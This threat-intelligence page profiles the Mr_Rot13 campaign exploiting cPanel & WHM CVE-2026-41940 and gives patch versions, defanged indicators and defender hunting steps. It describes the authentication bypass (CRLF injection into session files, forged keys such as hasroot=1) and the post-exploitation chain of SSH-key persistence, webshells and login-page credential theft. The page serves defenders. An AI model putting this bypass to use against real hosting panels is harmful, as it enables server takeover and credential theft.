Mr_Rot13 cPanel CVE-2026-41940 backdoor campaign

Summary

Mr_Rot13 is QiAnXin XLab's name for a long-running threat cluster exploiting CVE-2026-41940, a critical unauthenticated authentication-bypass vulnerability in cPanel & WHM. XLab says the flaw allows remote attackers to take over affected cPanel / WHM panels without credentials and that, after public disclosure on 2026-04-28, more than 2,000 attacker source IPs were observed participating in automated exploitation and cybercrime activity against the vulnerability.

The durable threat-intelligence value is control-plane takeover of shared-hosting infrastructure. XLab's Mr_Rot13 sample chain turns cPanel compromise into persistent host access by changing passwords, adding SSH keys, planting PHP webshells, injecting credential-harvesting JavaScript into login pages, deploying a cross-platform filemanager remote-control trojan, and reporting credentials/device data to attacker-controlled infrastructure.

Tags

• ops
• operations
• Mr_Rot13
• cPanel
• WHM
• CVE-2026-41940
• active exploitation
• authentication bypass
• control panel compromise
• web hosting
• shared hosting
• backdoor
• webshell
• SSH key persistence
• credential theft
• filemanager
• incident response

Why this matters

• cPanel / WHM is often the administrative root of shared-hosting environments; one panel takeover can expose many sites, databases, mailboxes, deployment secrets, and customer credentials.
• The exploit boundary is severe: XLab describes CVE-2026-41940 as unauthenticated and remotely reachable, with administrator-level panel takeover possible without a password.
• XLab observed broad exploitation by multiple criminal groups, including mining, ransomware, botnet propagation, backdoor implantation, and data theft activity.
• Mr_Rot13's payload is not just a one-shot shell. It layers SSH-key persistence, PHP webshell access, login-page JavaScript theft, password changes, and a remote-control file manager.
• Infrastructure and sample links reach back to at least 2020, suggesting a stable operator with years of low-detection activity rather than a transient opportunistic copycat.

Operational characteristics

• Initial access: exploitation of CVE-2026-41940 against vulnerable cPanel & WHM instances. XLab reports the vulnerability was publicly disclosed on 2026-04-28 and rapidly drew automated exploitation from more than 2,000 source IPs.
• Affected branches and fixes: cPanel's advisory says the issue affects cPanel & WHM versions after 11.40 and was patched in 11.86.0.41, 11.94.0.28, 11.102.0.39, 11.110.0.97, 11.118.0.63, 11.124.0.35, 11.126.0.54, 11.130.0.19, 11.132.0.29, 11.134.0.20, and 11.136.0.5 or later; WP Squared 136.1.7 and later is also patched.
• watchTowr root cause analysis: watchTowr's diff-based analysis describes a cPanel & WHM session loading/saving flaw where a pre-authentication whostmgrsession can be minted by a failed /login/?login_only=1 request, then abused by stripping the per-session ,<ob> cookie suffix and using CRLF injection in HTTP Basic credentials to write forged top-level fields into /var/cpanel/sessions/raw/<session>.
• Forged session fields: watchTowr demonstrated injected session keys such as hasroot=1, tfa_verified=1, user=root, cp_security_token=/cpsess..., and successful_internal_auth_with_timestamp=...; a later token-denied request can cause the forged raw session data to be promoted into the JSON cache and accepted by privileged WHM API paths.
• Observed impact: XLab cites a community-disclosed incident involving Southeast Asian government and military institutions where attackers reportedly stole about 4.37 GB of sensitive files after exploiting the vulnerability.
• Downloader stage: the campaign pulled an ELF payload named Update from cp.dene[.]de.com and launched it quietly in the background with nohup.
• Payload family: XLab captured three similar Update builds. The analyzed May 5 build was a stripped, statically linked 64-bit Linux ELF written in Go, with AI-looking Turkish-language log strings and project naming around Payload.
• Persistence and access: the infector changed the root password, installed an SSH public key labeled cpanel-updater, downloaded a PHP webshell named cpanel.py into /usr/local/cpanel/cgi-sys/, and deployed a filemanager remote-control trojan across multiple OS/architecture builds.
• Credential theft: the payload injected JavaScript into cPanel login pages and reported collected credentials and host information to attacker-controlled Telegram / web endpoints.
• Attribution clues: XLab tied the downloader domain, JavaScript C2, and older low-detection PHP backdoor material to wrned[.]com, active since at least 2020. The group name comes from the 0xWR Telegram identity clue and Rot13-obfuscated C2 logic.
• Operator reaction: after an apparent interaction with the attacker's Telegram bot on 2026-05-04, XLab observed the attackers update samples, replace bot tokens, remove the bot from the group, and later re-add it.

Defender heuristics

• Treat any vulnerable or recently exposed cPanel / WHM host as potentially compromised, not merely vulnerable; XLab's telemetry indicates mass exploitation after public disclosure.
• Patch cPanel & WHM to versions that remediate CVE-2026-41940, including the cPanel-listed fixed branches above, and restrict WHM/cPanel administration to trusted networks or VPN paths wherever possible.
• Review cPanel / WHM access logs for failed login attempts that still set whostmgrsession cookies, immediate follow-on requests carrying URL-decoded or suffix-stripped whostmgrsession values, requests without expected /cpsess.../ security-token prefixes, and suspicious 307 redirects or /json-api/ calls following failed authentication.
• Inspect /var/cpanel/sessions/raw/ and cPanel session caches for unexpected top-level hasroot, tfa_verified, user, cp_security_token, or successful_internal_auth_with_timestamp values, especially where they appear after CRLF-like line splitting or do not match legitimate authentication timelines.
• Hunt cPanel, web-server, and shell logs for downloads or execution from cp.dene[.]de.com, wpsock[.]com, and wrned[.]com, plus suspicious wget/curl to a root-owned temporary file followed by chmod and nohup.
• Inspect /usr/local/cpanel/cgi-sys/ and adjacent cPanel CGI/plugin paths for unexpected Python/PHP webshells such as cpanel.py, adminer.php, or files created near the exploitation window.
• Review /root/.ssh/authorized_keys, privileged user passwords, cron/systemd persistence, cPanel login templates, and JavaScript served by panel login pages for unauthorized additions.
• Search for unexpected filemanager binaries or architecture-specific payload names on Linux, Windows, and macOS hosts used for hosting administration.
• Preserve /var/cpanel/logs, /usr/local/cpanel/logs, authentication logs, shell history, process listings, web roots, cPanel plugin files, and memory/process evidence before cleanup.
• After confirmed compromise, rotate WHM/cPanel credentials, root passwords, SSH keys, database credentials, mail credentials, deployment tokens, CMS secrets, API keys, and any customer/site secrets reachable from the hosting node.

Related pages

• LiteSpeed cPanel CVE-2026-48172 exploitation
• Ghost CMS CVE-2026-26980 ClickFix poisoning
• Drupal Core CVE-2026-9082 exploitation
• ConnectWise ScreenConnect exploitation wave

Sources

• QiAnXin XLab: https://blog.xlab.qianxin.com/mr_rot13-the-elusive-6-year-hacker-group-weaponizing-critical-cpanel-flaws-for-backdoor-deployment/
• cPanel advisory: https://support.cpanel.net/hc/en-us/articles/40073787579671-Critical-Vulnerability-with-cPanel-WHM-Login-Authentication
• watchTowr technical analysis: https://labs.watchtowr.com/the-internet-is-falling-down-falling-down-falling-down-cpanel-whm-authentication-bypass-cve-2026-41940/
• CVE record: https://www.cve.org/CVERecord?id=CVE-2026-41940